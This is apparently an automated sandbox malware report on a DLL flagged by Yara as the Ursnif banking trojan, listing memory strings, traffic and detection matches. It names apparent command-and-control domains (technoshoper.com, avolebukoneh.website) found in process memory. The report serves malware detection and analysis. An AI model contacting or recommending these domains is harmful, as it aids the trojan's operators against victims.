Source: de-ch[1].htm.7.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_store&m
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_promotionalstripe_na
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://client-s.gateway.messenger.live.com
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://clkde.tradedoubler.com/click?p=195119&a=3064090&g=25021476
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&a=3064090&g=24545562
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://clkde.tradedoubler.com/click?p=295926&a=3064090&g=24886692
Source: {EBFDF004-4B97-11EC-90EB-ECF4BBEA1588}.dat.5.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&http
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&http
Source: {EBFDF004-4B97-11EC-90EB-ECF4BBEA1588}.dat.5.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: {EBFDF004-4B97-11EC-90EB-ECF4BBEA1588}.dat.5.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: iab2Data[2].json.7.dr	String found in binary or memory: https://doceree.com/.well-known/deviceStorage.json
Source: iab2Data[2].json.7.dr	String found in binary or memory: https://doceree.com/us-privacy-policy/
Source: iab2Data[2].json.7.dr	String found in binary or memory: https://evorra.com/product-privacy-policy/
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.7.dr	String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: rundll32.exe, 00000003.00000003.1191310809.00000000009E6000.00000004.00000001.sdmp	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4xdax"
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&ct=1637587646&rver=7.0.6730.0&am
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://login.live.com/logout.srf?ct=1637587647&rver=7.0.6730.0&lc=1033&id=1184&lru=
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&rpsnv=13&ct=1637587646&rver=7.0.6730.0&w
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
Source: iab2Data[2].json.7.dr	String found in binary or memory: https://nextmillennium.io/privacy-policy/
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://onedrive.live.com/#qt=mru
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://onedrive.live.com/about/en/download/
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://onedrive.live.com;Fotos
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://onedrive.live.com;OneDrive-App
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
Source: iab2Data[2].json.7.dr	String found in binary or memory: https://optimise-it.de/datenschutz
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://outlook.com/
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://outlook.live.com/calendar
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png"
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&hl=de-ch&refer
Source: {EBFDF004-4B97-11EC-90EB-ECF4BBEA1588}.dat.5.dr	String found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://secure.adnxs.com/clktrb?id=764680&t=1
Source: iab2Data[2].json.7.dr	String found in binary or memory: https://silvermob.com/privacy
Source: iab2Data[2].json.7.dr	String found in binary or memory: https://smartyads.com/privacy-policy
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-me
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-shoppingstripe-nav
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=travelnavlink
Source: imagestore.dat.7.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAQYSTg.img?h=368&
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1aXBV1.img?h=27&
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w
Source: loaddll32.exe, 00000000.00000003.1189532035.0000000001421000.00000004.00000001.sdmp	String found in binary or memory: https://statics-marketingsites-eus-ms-com.akamaized.net/statics/override.css
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://support.skype.com
Source: loaddll32.exe, 00000000.00000003.1189899566.0000000002258000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.1174702628.0000000005498000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.1191239094.0000000004F48000.00000004.00000040.sdmp	String found in binary or memory: https://technoshoper.com
Source: loaddll32.exe, 00000000.00000003.1189899566.0000000002258000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.1174702628.0000000005498000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.1191239094.0000000004F48000.00000004.00000040.sdmp	String found in binary or memory: https://technoshoper.comhttps://avolebukoneh.websitehttp://technoshoper.comhttp://avolebukoneh.websi
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?"
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://twitter.com/
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://twitter.com/i/notifications;Ich
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a
Source: iab2Data[2].json.7.dr	String found in binary or memory: https://www.bidstack.com/privacy-policy/
Source: iab2Data[2].json.7.dr	String found in binary or memory: https://www.botman.ninja/privacy-policy
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.ebay.ch/?mkcid=1&mkrid=5222-53480-19255-0&siteid=193&campid=5338626668&t
Source: imagestore.dat.7.dr	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: imagestore.dat.7.dr	String found in binary or memory: https://www.google.com/favicon.ico
Source: imagestore.dat.7.dr	String found in binary or memory: https://www.google.com/favicon.ico~
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.msn.com/de-ch
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.msn.com/de-ch/
Source: {EBFDF004-4B97-11EC-90EB-ECF4BBEA1588}.dat.5.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp&item=deferred_page%3a1&ignorejs=webcore%2fmodules%2fjsb
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/bei-den-%c3%a4rzten-schauen-die-beh%c3%b6rden-einfach-weg/ar-AA
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/brand-an-der-langstrasse/ar-AAQXL4f?ocid=hplocalnews
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/defektes-paket-mit-radioaktivem-inhalt-in-swiss-flieger-entdeck
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/jacqueline-hofer-tritt-doch-nicht-zur-wiederwahl-an/ar-AAQTAnf?
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/mehrere-tausend-menschen-demonstrieren-in-z%c3%bcrich/ar-AAQWtO
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/sie-bew%c3%a4ltigen-alltagsstress-und-todesszenen/ar-AAQUall?oc
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/t%c3%b6fffahrer-liefert-sich-wilde-verfolgungsjagd-mit-der-poli
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/t%c3%b6fffahrer-st%c3%bcrzt-nach-verfolgungsjagd-mit-der-polize
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.msn.com/de-ch/sport/fussball/der-fcz-zittert-und-steht-doch-ganz-oben/ar-AAQWrxt?ocid=hp
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.msn.com/de-ch/sport/other/runter-rauf-runter-wie-gc-in-genf-vom-weg-abkommt/ar-AAQYdQe?o
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.msn.com/de-ch/sport?ocid=StripeOCID
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&auth=1&wdorigin=msn
Source: iab2Data[2].json.7.dr	String found in binary or memory: https://www.onlineumfragen.com/3index_2010_agb.cfm
Source: iab2Data[2].json.7.dr	String found in binary or memory: https://www.queryclick.com/privacy-policy
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_mestripe_logo_d
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_shop_de&utm
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.skype.com/
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://www.skype.com/de
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://www.skype.com/de/download-skype
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&vertical=custom&pageType=
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
Source: iab2Data[2].json.7.dr	String found in binary or memory: https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json
Source: iab2Data[2].json.7.dr	String found in binary or memory: https://www.stroeer.de/ssp-datenschutz
Source: iab2Data[2].json.7.dr	String found in binary or memory: https://www.stroeer.de/werben-mit-stroeer/onlinewerbung/programmatic-data/sdi-datenschutz-b2c
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.tippsundtricks.co/gesundheit/finger-persoenlichkeit/?utm_campaign=DECH-Finger&utm_so
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.tippsundtricks.co/gesundheit/knoblauchzehe-unters-kopfkissen/?utm_campaign=DECH-Knoblauc
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.tippsundtricks.co/lifehacks/schwamm-kuhlschrank/?utm_campaign=DECH-schwamm&utm_sourc

Source: unknown

DNS traffic detected: queries for: www.msn.com

Source: global traffic	HTTP traffic detected: GET /tag?o=6208086025961472&upapi=true HTTP/1.1Accept: application/javascript, /;q=0.8Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: btloader.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250 HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: ad.doubleclick.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /px.gif?ch=1&e=0.5207611127885279 HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: ad-delivery.netConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 172.67.70.134:443 -> 192.168.2.4:49820 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.70.134:443 -> 192.168.2.4:49819 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.215.230:443 -> 192.168.2.4:49828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.69.19:443 -> 192.168.2.4:49829 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.215.230:443 -> 192.168.2.4:49827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.69.19:443 -> 192.168.2.4:49830 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000003.1197864565.000000000531B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174702628.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191239094.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191135621.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1207204484.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1189899566.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174643571.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174822203.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191409157.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174672667.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174877788.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1188941851.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191287733.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191167902.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1189311900.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191103742.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1206556297.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174724933.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191264405.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1189232893.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191197340.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1188897799.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174847210.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1189190747.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174861431.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1189102105.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191219624.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1188997373.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1175009445.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1189042017.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 984, type: MEMORYSTR
Source: Yara match	File source: 0.2.loaddll32.exe.10f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.49194a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4fb94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4fb94a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.710000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.49194a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.2fa0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.19794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.19794a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.2f90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.2fd0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.1340000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.2fa0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.1100000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.1100000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1204664213.0000000001100000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1204064655.00000000006F0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1206945247.0000000004919000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1208151025.0000000004FB9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1206904709.0000000002F90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1204058262.00000000006E0000.00000004.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1204595185.00000000010F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1206985280.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1206433585.0000000001979000.00000004.00000040.sdmp, type: MEMORY

Source: loaddll32.exe, 00000000.00000002.1205256384.000000000136B000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000003.1197864565.000000000531B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174702628.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191239094.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191135621.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1207204484.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1189899566.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174643571.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174822203.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191409157.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174672667.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174877788.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1188941851.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191287733.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191167902.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1189311900.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191103742.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1206556297.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174724933.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191264405.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1189232893.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191197340.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1188897799.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174847210.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1189190747.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174861431.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1189102105.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191219624.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1188997373.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1175009445.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1189042017.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 984, type: MEMORYSTR
Source: Yara match	File source: 0.2.loaddll32.exe.10f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.49194a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4fb94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4fb94a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.710000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.49194a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.2fa0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.19794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.19794a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.2f90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.2fd0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.1340000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.2fa0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.1100000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.1100000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1204664213.0000000001100000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1204064655.00000000006F0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1206945247.0000000004919000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1208151025.0000000004FB9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1206904709.0000000002F90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1204058262.00000000006E0000.00000004.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1204595185.00000000010F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1206985280.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1206433585.0000000001979000.00000004.00000040.sdmp, type: MEMORY

System Summary:

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
